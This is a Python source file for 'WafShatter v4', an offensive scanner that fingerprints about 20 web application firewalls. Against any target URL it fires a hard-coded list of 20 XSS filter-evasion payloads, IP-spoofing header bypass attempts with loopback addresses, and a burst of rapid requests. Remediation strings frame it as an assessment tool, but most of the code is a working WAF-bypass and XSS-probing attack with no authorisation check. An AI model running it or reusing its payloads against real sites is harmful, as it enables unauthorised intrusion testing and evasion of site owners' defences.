#!/usr/bin/env python3
"""WafShatter v4 — Pro-grade WAF Detection & Bypass Analyser.

Improvements over v3:
- 20+ WAF profiles with multi-signal scoring (headers + body + status + timing)
- Bypass testing only flags when WAF is bypassed AND XSS payload reflects unblocked
- Confidence-gated: no low-signal noise
- IP spoofing bypass detection with header rotation
- Rate-limit fingerprinting
"""
import asyncio, aiohttp, json, re, sys, time, random
from pathlib import Path
from urllib.parse import urlparse, quote

sys.path.insert(0, str(Path(__file__).parent))
from smart_filter import (
    build_baseline_404, delay, confidence_score, confidence_label,
    severity_from_confidence, detect_waf, REQUEST_DELAY,
    is_truly_accessible, meets_confidence_floor, random_ua
)

WAF_PROFILES = {
    "Cloudflare":    {
        "headers": ["cf-ray", "cf-cache-status", "cf-request-id"],
        "body":    ["cloudflare", "cf-ray", "attention required"],
        "status":  [403, 503],
        "score_threshold": 3,
    },
    "Akamai":        {
        "headers": ["x-check-cacheable", "x-akamai-transformed", "akamai-grn"],
        "body":    ["akamai", "reference #"],
        "status":  [403],
        "score_threshold": 3,
    },
    "Imperva/Incapsula": {
        "headers": ["x-iinfo", "incap-ses", "visid_incap"],
        "body":    ["incapsula", "request unsuccessful", "_incapsula_"],
        "status":  [403],
        "score_threshold": 3,
    },
    "AWS WAF":       {
        "headers": ["x-amzn-requestid", "x-amzn-trace-id", "x-amzn-waf-action"],
        "body":    ["request blocked", "aws waf"],
        "status":  [403],
        "score_threshold": 3,
    },
    "Sucuri":        {
        "headers": ["x-sucuri-id", "x-sucuri-cache"],
        "body":    ["sucuri", "access denied - sucuri"],
        "status":  [403],
        "score_threshold": 3,
    },
    "F5 BIG-IP ASM": {
        "headers": ["x-wa-info", "x-f5-request-id"],
        "body":    ["the requested url was rejected", "f5 networks"],
        "status":  [403],
        "score_threshold": 2,
    },
    "Barracuda":     {
        "headers": ["barra_counter_session"],
        "body":    ["barracuda", "barracuda networks"],
        "status":  [403],
        "score_threshold": 2,
    },
    "ModSecurity":   {
        "headers": ["mod_security", "x-waf-status"],
        "body":    ["not acceptable!", "406 not acceptable", "mod_security"],
        "status":  [406, 403],
        "score_threshold": 2,
    },
    "Wordfence":     {
        "headers": [],
        "body":    ["generated by wordfence", "your access to this site has been limited"],
        "status":  [403, 503],
        "score_threshold": 2,
    },
    "Fortinet FortiWeb": {
        "headers": ["x-fw-type", "fortiwafsid"],
        "body":    ["fortigate", "fortiweb"],
        "status":  [403],
        "score_threshold": 2,
    },
    "Fastly":        {
        "headers": ["x-served-by", "x-cache-hits", "x-fastly-request-id"],
        "body":    ["fastly error"],
        "status":  [503],
        "score_threshold": 3,
    },
    "Varnish":       {
        "headers": ["x-varnish", "x-varnish-cache"],
        "body":    ["varnish cache server", "error 503"],
        "status":  [503],
        "score_threshold": 3,
    },
    "Azure Front Door": {
        "headers": ["x-azure-ref", "x-fd-healthprobe"],
        "body":    ["microsoft azure"],
        "status":  [403],
        "score_threshold": 3,
    },
    "DataDome":      {
        "headers": ["x-datadome-isbot", "x-datadome"],
        "body":    ["datadome", "blocked by datadome"],
        "status":  [403],
        "score_threshold": 2,
    },
    "PerimeterX":    {
        "headers": ["_px", "x-px"],
        "body":    ["perimeterx", "px-captcha"],
        "status":  [403],
        "score_threshold": 2,
    },
    "DDoS-Guard":    {
        "headers": ["ddos-guard"],
        "body":    ["ddos-guard"],
        "status":  [403],
        "score_threshold": 2,
    },
    "Radware":       {
        "headers": ["x-rdwr-pop", "x-sl-compstate"],
        "body":    ["radware", "web application firewall"],
        "status":  [403],
        "score_threshold": 2,
    },
    "Reblaze":       {
        "headers": ["x-reblaze-protection"],
        "body":    ["reblaze", "access denied"],
        "status":  [403],
        "score_threshold": 2,
    },
    "Nginx (custom WAF)": {
        "headers": ["x-nginx-cache"],
        "body":    ["403 forbidden", "nginx"],
        "status":  [403],
        "score_threshold": 4,  # Very generic, needs strong signal
    },
}

BYPASS_PAYLOADS = [
    ("case_variation",    '<ScRiPt>alert`1`</sCrIpT>'),
    ("url_encoded",       '%3Cscript%3Ealert%281%29%3C%2Fscript%3E'),
    ("double_encoded",    '%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E'),
    ("html_entity",       '&#60;script&#62;alert(1)&#60;/script&#62;'),
    ("unicode_escape",    '\u003cscript\u003ealert(1)\u003c/script\u003e'),
    ("svg_onload",        '<svg/onload=alert(1)>'),
    ("img_onerror",       '<img src=x onerror=alert(1)>'),
    ("js_protocol",       'javascript:alert(1)'),
    ("fromcharcode",      '<script>alert(String.fromCharCode(49))</script>'),
    ("newline_bypass",    '<scri\npt>alert(1)</scri\npt>'),
    ("tab_bypass",        '<scri\tpt>alert(1)</scri\tpt>'),
    ("null_byte",         '<scr\x00ipt>alert(1)</script>'),
    ("comment_break",     '<s<!---->cript>alert(1)</script>'),
    ("data_uri",          'data:text/html,<script>alert(1)</script>'),
    ("vbscript",          'vbscript:msgbox(1)'),
    ("expression_css",    '<div style="width:expression(alert(1))">'),
    ("base64_data_uri",   'data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='),
    ("template_literal",  '<script>alert`xss`</script>'),
    ("obfuscated_on",     '<body onload=alert(1)>'),
    ("srcdoc",            '<iframe srcdoc="<script>alert(1)</script>">'),
]

IP_SPOOF_HEADERS = [
    "X-Forwarded-For", "X-Real-IP", "X-Originating-IP",
    "X-Remote-IP", "CF-Connecting-IP", "True-Client-IP",
    "X-Client-IP", "Client-IP", "Forwarded",
]


class WafShatter:
    def __init__(self, target):
        self.target = target.rstrip('/')
        self.findings = []
        self.waf_name = None
        self.baseline_status = None
        self.baseline_body = ""
        self.baseline_404 = ""

    async def _get(self, sess, url, headers=None, timeout=10):
        try:
            t0 = time.monotonic()
            async with sess.get(url, headers=headers or {}, ssl=False,
                                timeout=aiohttp.ClientTimeout(total=timeout),
                                allow_redirects=True) as r:
                body = await r.text(errors='ignore')
                return r.status, body, dict(r.headers), time.monotonic() - t0
        except Exception:
            return None, "", {}, 0.0

    async def fingerprint_waf(self, sess):
        print("\n[*] Fingerprinting WAF/CDN — multi-signal scoring...")
        s_norm, b_norm, h_norm, _ = await self._get(sess, self.target)
        await delay()
        self.baseline_status = s_norm
        self.baseline_body = b_norm or ""

        # Send known-bad XSS to trigger WAF
        s_xss, b_xss, h_xss, _ = await self._get(
            sess, f"{self.target}/?q=<script>alert(1)</script>&id=1%27%20OR%20%271%27=%271")
        await delay()

        detected = []
        for waf_name, profile in WAF_PROFILES.items():
            score = 0
            all_hdrs_str = " ".join(
                f"{k}:{v}" for k, v in {**h_norm, **h_xss}.items()
            ).lower()
            all_body = (b_norm or '') + (b_xss or '')
            all_body_lower = all_body.lower()

            for hdr in profile["headers"]:
                if hdr.lower() in all_hdrs_str:
                    score += 2
            for bs in profile["body"]:
                if bs.lower() in all_body_lower:
                    score += 2
            if s_xss in profile["status"]:
                score += 1
            # Bonus: normal OK but XSS blocked
            if s_norm and s_norm < 400 and s_xss in [403, 406]:
                score += 1

            if score >= profile.get("score_threshold", 2):
                detected.append((waf_name, score))

        if detected:
            detected.sort(key=lambda x: -x[1])
            self.waf_name = detected[0][0]
            conf = min(95, 55 + detected[0][1] * 6)
            if meets_confidence_floor(conf):
                waf_list = [n for n, _ in detected]
                self.findings.append({
                    'type': 'WAF_DETECTED',
                    'severity': 'INFO',
                    'confidence': conf,
                    'confidence_label': confidence_label(conf),
                    'wafs_detected': waf_list,
                    'primary_waf': self.waf_name,
                    'detection_score': detected[0][1],
                    'detail': f"WAF/CDN detected: {self.waf_name} (score={detected[0][1]})",
                    'remediation': (
                        "WAF presence is positive. "
                        "Ensure rules are regularly tuned and updated. "
                        "Enable bot management and rate limiting."
                    ),
                })
            print(f"  [+] WAF detected: {', '.join(n for n, _ in detected)}")
            return True
        else:
            self.findings.append({
                'type': 'NO_WAF_DETECTED',
                'severity': 'MEDIUM',
                'confidence': 70,
                'confidence_label': 'Medium',
                'detail': "No WAF/CDN detected — target appears directly exposed",
                'remediation': (
                    "Deploy a WAF (Cloudflare, AWS WAF, or ModSecurity). "
                    "Without a WAF, automated attacks reach your application directly."
                ),
            })
            print("  [!] No WAF detected — target appears unprotected")
            return False

    async def test_bypasses(self, sess):
        if not self.waf_name:
            return
        print(f"\n[*] Testing {len(BYPASS_PAYLOADS)} bypass payloads against {self.waf_name}...")
        successful = []

        for technique, payload in BYPASS_PAYLOADS:
            url = f"{self.target}/?q={quote(payload, safe='')}"
            s, body, hdrs, _ = await self._get(sess, url)
            await delay()

            # Bypass = WAF did NOT block AND payload is reflected
            was_blocked = s in [403, 406, 429, 503]
            payload_reflected = payload.lower() in (body or '').lower()

            if not was_blocked and payload_reflected:
                successful.append({
                    'technique': technique,
                    'payload': payload,
                    'http_status': s,
                    'proof': f"HTTP {s} — payload '{payload[:60]}' reflected unfiltered",
                })
                print(f"  [!] WAF BYPASSED: {technique} — payload reflected (HTTP {s})")
            elif was_blocked:
                pass  # WAF did its job

        if successful:
            conf = 85 if len(successful) >= 3 else 75
            if meets_confidence_floor(conf):
                self.findings.append({
                    'type': 'WAF_BYPASS',
                    'severity': 'HIGH',
                    'confidence': conf,
                    'confidence_label': confidence_label(conf),
                    'waf': self.waf_name,
                    'bypass_count': len(successful),
                    'bypasses': successful,
                    'proof': f"{len(successful)} bypass(es) confirmed — payload reflected without WAF block",
                    'detail': (f"{self.waf_name} bypassed with {len(successful)} technique(s): "
                               f"{', '.join(b['technique'] for b in successful[:5])}"),
                    'remediation': (
                        "Review WAF rule set and tune for obfuscated payload variants. "
                        "Enable strict mode. Consider a more robust WAF with ML-based detection."
                    ),
                })

    async def test_ip_spoof_bypass(self, sess):
        print("\n[*] Testing IP-spoofing header bypass (127.0.0.1 allowlist)...")
        spoof_values = ['127.0.0.1', '0.0.0.0', '::1', '10.0.0.1', 'localhost']
        attack_url = f"{self.target}/?q=<script>alert(1)</script>"

        for hdr in IP_SPOOF_HEADERS:
            for val in spoof_values:
                s, body, hdrs, _ = await self._get(
                    sess, attack_url, headers={hdr: val})
                await delay()

                blocked_normally = self.baseline_status and s != self.baseline_status
                is_bypassed = s == 200 and '<script>' in (body or '').lower()

                if is_bypassed:
                    conf = 85
                    if meets_confidence_floor(conf):
                        self.findings.append({
                            'type': 'WAF_IP_SPOOF_BYPASS',
                            'severity': 'HIGH',
                            'confidence': conf,
                            'confidence_label': confidence_label(conf),
                            'header': hdr,
                            'spoofed_ip': val,
                            'http_status': s,
                            'proof': f"{hdr}: {val} → WAF bypassed, XSS payload reflected (HTTP {s})",
                            'detail': f"WAF bypass via {hdr} spoofing — server trusts client-supplied IP",
                            'remediation': (
                                f"Do not trust {hdr} for access control decisions. "
                                "Only accept IP headers from known upstream proxies."
                            ),
                        })
                    print(f"  [HIGH] IP spoof bypass: {hdr}: {val}")

    async def test_rate_limit(self, sess):
        print("\n[*] Rate limit detection (20 rapid requests)...")
        statuses = []
        t0 = time.monotonic()
        for _ in range(20):
            s, _, _, _ = await self._get(sess, self.target, timeout=5)
            if s:
                statuses.append(s)
        elapsed = time.monotonic() - t0

        rate_limited = sum(1 for s in statuses if s == 429)
        if rate_limited == 0:
            self.findings.append({
                'type': 'NO_RATE_LIMITING',
                'severity': 'LOW',
                'confidence': 70,
                'confidence_label': 'Medium',
                'requests_sent': 20,
                'duration_seconds': round(elapsed, 1),
                'status_codes': sorted(set(statuses)),
                'detail': "No rate limiting detected — 20 rapid requests returned no 429 responses",
                'remediation': (
                    "Implement rate limiting (e.g. nginx limit_req, Cloudflare rate rules, "
                    "or an API gateway). Protects against brute force and DDoS."
                ),
            })
            print(f"  [!] No rate limiting — {len(statuses)} requests, no 429 seen")
        else:
            print(f"  [+] Rate limiting active — {rate_limited}/20 requests returned 429")

    async def run(self):
        print("=" * 60)
        print("  WafShatter v4 — WAF Detection & Bypass Engine")
        print("  Note: 403 from WAF = protection working (not a bypass)")
        print("=" * 60)
        conn = aiohttp.TCPConnector(limit=8, ssl=False)
        async with aiohttp.ClientSession(
                connector=conn,
                timeout=aiohttp.ClientTimeout(total=60),
                headers={"User-Agent": random_ua()}) as sess:

            self.baseline_404 = await build_baseline_404(sess, self.target)
            waf_found = await self.fingerprint_waf(sess)
            if waf_found:
                await self.test_bypasses(sess)
                await self.test_ip_spoof_bypass(sess)
            await self.test_rate_limit(sess)

        return self.findings


def get_target():
    p = Path("reports/_target.txt")
    if p.exists():
        return p.read_text().strip()
    u = input("[?] Target URL: ").strip()
    return u if u.startswith("http") else "https://" + u


def main():
    target = get_target()
    Path("reports").mkdir(exist_ok=True)
    findings = asyncio.run(WafShatter(target).run())
    with open("reports/wafshatter.json", 'w') as f:
        json.dump(findings, f, indent=2, default=str)
    print(f"\n[+] {len(findings)} findings → reports/wafshatter.json")


if __name__ == '__main__':
    main()
